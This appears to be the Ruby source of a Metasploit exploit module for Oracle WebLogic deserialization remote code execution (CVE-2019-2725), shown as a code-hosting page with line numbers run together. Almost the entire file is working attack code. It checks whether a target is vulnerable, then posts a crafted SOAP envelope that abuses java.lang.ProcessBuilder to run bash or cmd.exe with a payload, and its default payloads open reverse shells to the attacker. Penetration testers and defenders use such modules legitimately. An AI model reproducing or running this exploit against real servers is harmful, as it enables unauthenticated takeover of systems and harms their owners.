Path: blob/master/modules/exploits/multi/misc/weblogic_deserialize_asyncresponseservice.rb
31166 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient9include Msf::Exploit::Powershell1011def initialize(info = {})12super(13update_info(14info,15'Name' => 'Oracle Weblogic Server Deserialization RCE - AsyncResponseService',16'Description' => %q{17An unauthenticated attacker with network access to the Oracle Weblogic Server T318interface can send a malicious SOAP request to the interface WLS AsyncResponseService19to execute code on the vulnerable host.20},21'Author' => [22'Andres Rodriguez - 2Secure (@acamro) <acamro[at]gmail.com>', # Metasploit Module23],24'License' => MSF_LICENSE,25'References' => [26['CVE', '2019-2725'],27['URL', 'http://web.archive.org/web/20190508024326/http://www.cnvd.org.cn/webinfo/show/4999'],28['URL', 'https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html'],29['URL', 'https://twitter.com/F5Labs/status/1120822404568244224']30],31'Privileged' => false,32'Targets' => [33[34'Unix',35{36'Platform' => 'unix',37'Arch' => ARCH_CMD,38'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }39}40],41[42'Windows',43{44'Platform' => 'win',45'Arch' => [ARCH_X64, ARCH_X86],46'DefaultOptions' => { 'PAYLOAD' => 'windows/meterpreter/reverse_tcp' }47}48],49[50'Solaris',51{52'Platform' => 'solaris',53'Arch' => ARCH_CMD,54'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_perl' },55'Payload' => {56'Space' => 2048,57'DisableNops' => true,58'Compat' =>59{60'PayloadType' => 'cmd',61'RequiredCmd' => 'generic perl telnet'62}63}64}65]66],67'DefaultTarget' => 0,68'DefaultOptions' => {69'WfsDelay' => 1270},71'DisclosureDate' => '2019-04-23',72'Notes' => {73'Stability' => [ CRASH_SAFE ],74'SideEffects' => [ IOC_IN_LOGS ],75'Reliability' => [ REPEATABLE_SESSION ]76}77)78)7980register_options(81[82Opt::RPORT(7001),83OptString.new('TARGETURI', [true, 'URL to AsyncResponseService', '/_async/AsyncResponseService'])84]85)86end8788def check89res = send_request_cgi(90'uri' => normalize_uri(target_uri.path),91'method' => 'POST',92'ctype' => 'text/xml',93'headers' => { 'SOAPAction' => '' }94)9596if res && res.code == 500 && res.body.include?('<faultcode>env:Client</faultcode>')97vprint_status("The target returned a vulnerable HTTP code: /#{res.code}")98vprint_status("The target returned a vulnerable HTTP error: /#{res.body.split("\n")[0]}")99Exploit::CheckCode::Vulnerable100elsif res && res.code != 202101vprint_status('The target returned a non-vulnerable HTTP code')102Exploit::CheckCode::Safe103elsif res.nil?104vprint_status('The target did not respond in an expected way')105Exploit::CheckCode::Unknown106else107vprint_status("The target returned HTTP code: #{res.code}")108vprint_status("The target returned HTTP body: #{res.body.split("\n")[0]} [...]")109Exploit::CheckCode::Unknown110end111end112113def exploit114print_status('Generating payload...')115case target.name116when 'Windows'117string0_cmd = 'cmd.exe'118string1_param = '/c'119shell_payload = cmd_psh_payload(payload.encoded, payload_instance.arch.first, { remove_comspec: true, encoded: false })120when 'Unix', 'Solaris'121string0_cmd = '/bin/bash'122string1_param = '-c'123shell_payload = payload.encoded124end125126random_action = rand_text_alphanumeric(20)127random_relates = rand_text_alphanumeric(20)128129soap_payload = %(<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/")130soap_payload << %(xmlns:wsa="http://www.w3.org/2005/08/addressing")131soap_payload << %(xmlns:asy="http://www.bea.com/async/AsyncResponseService">)132soap_payload << %(<soapenv:Header>)133soap_payload << %(<wsa:Action>#{random_action}</wsa:Action>)134soap_payload << %(<wsa:RelatesTo>#{random_relates}</wsa:RelatesTo>)135soap_payload << %(<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">)136soap_payload << %(<void class="java.lang.ProcessBuilder">)137soap_payload << %(<array class="java.lang.String" length="3">)138soap_payload << %(<void index="0">)139soap_payload << %(<string>#{string0_cmd}</string>)140soap_payload << %(</void>)141soap_payload << %(<void index="1">)142soap_payload << %(<string>#{string1_param}</string>)143soap_payload << %(</void>)144soap_payload << %(<void index="2">)145soap_payload << %(<string>#{shell_payload.encode(xml: :text)}</string>)146# soap_payload << %Q|<string>#{xml_encode(shell_payload)}</string>|147soap_payload << %(</void>)148soap_payload << %(</array>)149soap_payload << %(<void method="start"/>)150soap_payload << %(</void>)151soap_payload << %(</work:WorkContext>)152soap_payload << %(</soapenv:Header>)153soap_payload << %(<soapenv:Body>)154soap_payload << %(<asy:onAsyncDelivery/>)155soap_payload << %(</soapenv:Body>)156soap_payload << %(</soapenv:Envelope>)157158print_status('Sending payload...')159160begin161res = send_request_cgi(162'uri' => normalize_uri(target_uri.path),163'method' => 'POST',164'ctype' => 'text/xml',165'data' => soap_payload,166'headers' => { 'SOAPAction' => '' }167)168rescue Errno::ENOTCONN169fail_with(Failure::Disconnected, 'The target forcibly closed the connection, and is likely not vulnerable.')170end171172if res.nil?173fail_with(Failure::Unreachable, 'No response from host')174elsif res && res.code != 202175fail_with(Failure::UnexpectedReply, "Exploit failed. Host responded with HTTP code #{res.code} instead of HTTP code 202")176end177end178end179180181